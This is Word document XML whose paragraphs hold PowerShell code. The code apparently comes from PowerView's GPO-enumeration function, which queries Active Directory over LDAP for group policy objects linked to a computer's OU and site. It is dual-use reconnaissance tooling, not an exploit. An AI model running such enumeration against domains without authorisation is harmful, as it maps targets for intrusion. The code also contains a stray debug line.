    <w:p w14:paraId="23040531" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Int]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C47FC0B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $PageSize = 200,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209D2AA2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="48794D69" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Management.Automation.PSCredential]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="709B96B3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Credential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF13DE7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E0778D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0E570B48" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    begin {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C587F54" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $GPOSearcher = Get-DomainSearcher -Domain $Domain -DomainController $DomainController -Credential $Credential -ADSpath $ADSpath -PageSize $PageSize</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A199FDF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3416E622" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6D878210" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    process {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0295863E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if ($GPOSearcher) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4BB7B0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1CD2B980" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            if($ComputerName) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B2336D2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $GPONames = @()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FAEF87" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Computers = Get-NetComputer -ComputerName $ComputerName -Domain $Domain -DomainController $DomainController -FullData -PageSize $PageSize</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C3F4B1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="298F24CF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                if(!$Computers) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7383F25C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    throw "Computer $ComputerName in domain '$Domain' not found! Try a fully qualified host name"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F5B978" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D908C9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5932D8D7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                # get the given computer's OU</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB5976F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $ComputerOUs = @()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677F434E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                ForEach($Computer in $Computers) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1845FA34" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    # extract all OUs a computer is a part of</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F9C61D3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $DN = $Computer.distinguishedname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D61B9B0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="691D6D33" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $ComputerOUs += $DN.split(",") | ForEach-Object {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F33CAF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        if($_.startswith("OU=")) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166BC26B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            $DN.substring($DN.indexof($_))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0E493B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="221C256A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD42A34" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6263C66F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C07D59" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                Write-Verbose "ComputerOUs: $ComputerOUs"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B957DD2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3108CDDD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                # find all the GPOs linked to the computer's OU</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39CE5267" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                ForEach($ComputerOU in $ComputerOUs) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B3C1F52" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $GPONames += Get-NetOU -Domain $Domain -DomainController $DomainController -ADSpath $ComputerOU -FullData -PageSize $PageSize | ForEach-Object { </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C8A67D5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        # get any GPO links</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34BDFE18" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        write-verbose "blah: $($_.name)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C99C88" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $_.gplink.split("][") | ForEach-Object {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C8707FE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            if ($_.startswith("LDAP")) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="334A550B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                $_.split(";")[0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45AD628F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27AAE071" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61711661" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A748471" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7309D0E5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A9FC5F8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                Write-Verbose "GPONames: $GPONames"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7AA0C6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="01769211" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                # find any GPOs linked to the site for the given computer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CCE4A40" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $ComputerSite = (Get-SiteName -ComputerName $ComputerName).SiteName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51035C4E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                if($ComputerSite -and ($ComputerSite -notlike 'Error*')) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F90697" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $GPONames += Get-NetSite -SiteName $ComputerSite -FullData | ForEach-Object {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="547E71B2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        if($_.gplink) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11DCA544" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            $_.gplink.split("][") | ForEach-Object {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58BCCEE2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                if ($_.startswith("LDAP")) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E59A23F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                    $_.split(";")[0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB2252D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60490477" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3D3041" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02712474" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49902CEA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B17DE62" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1DBB2A20" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $GPONames | Where-Object{$_ -and ($_ -ne '')} | ForEach-Object {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="304BBCE8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="649ADB5C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    # use the gplink as an ADS path to enumerate all GPOs for the computer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23DE326A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $GPOSearcher = Get-DomainSearcher -Domain $Domain -DomainController $DomainController -Credential $Credential -ADSpath $_ -PageSize $PageSize</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E40C5C1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $GPOSearcher.filter="(&amp;(objectCategory=groupPolicyContainer)(name=$GPOname))"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35EF4E43" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="389A2F51" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E15FB23" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $Results = $GPOSearcher.FindAll()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5036D7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $Results | Where-Object {$_} | ForEach-Object {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C54E119" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            $Out = Convert-LDAPProperty -Properties $_.Properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4C53D3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            $Out | Add-Member Noteproperty 'ComputerName' $ComputerName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E389407" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            $Out</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B93AA3C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF68389" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $Results.dispose()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E20DA0A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $GPOSearcher.dispose()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D597F1C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6E27F8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    catch {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="760023EA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        Write-Warning $_</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E6ECB81" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B820BAC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4706B068" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66AA6769" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="324E1AFC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="796E0857" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                if($DisplayName) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D42E6CC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $GPOSearcher.filter="(&amp;(objectCategory=groupPolicyContainer)(displayname=$DisplayName))"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A9CD6E1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DEC6D79" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02309ED7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $GPOSearcher.filter="(&amp;(objectCategory=groupPolicyContainer)(name=$GPOname))"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E4A5674" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E36A66" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="437595C2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10FF10FE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $Results = $GPOSearcher.FindAll()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="243B87C3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $Results | Where-Object {$_} | ForEach-Object {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD4131E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        if($ADSPath -and ($ADSpath -Match '^GC://')) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54EE201E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            $Properties = Convert-LDAPProperty -Properties $_.Properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E52FDE8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E39368" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                $GPODN = $Properties.distinguishedname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="159AECBA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                $GPODomain = $GPODN.subString($GPODN.IndexOf("DC=")) -replace 'DC=','' -replace ',','.'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73785D48" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                $gpcfilesyspath = "\\$GPODomain\SysVol\$GPODomain\Policies\$($Properties.cn)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B9F7875" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                $Properties | Add-Member Noteproperty 'gpcfilesyspath' $gpcfilesyspath</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FDD1085" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                $Properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ECFAD6F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="403D637A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            catch {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1E053B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                $Properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30BB6DF8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21768C27" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BEB6B77" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71869004" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            # convert/process the LDAP fields for each result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524FD6D9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            Convert-LDAPProperty -Properties $_.Properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF2242A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73623739" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19ED68FD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $Results.dispose()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E17F50" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $GPOSearcher.dispose()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CDDEBE4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28AF5CC7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                catch {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A86F4B0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    Write-Warning $_</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5665FF32" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21FBF34A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B1145B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
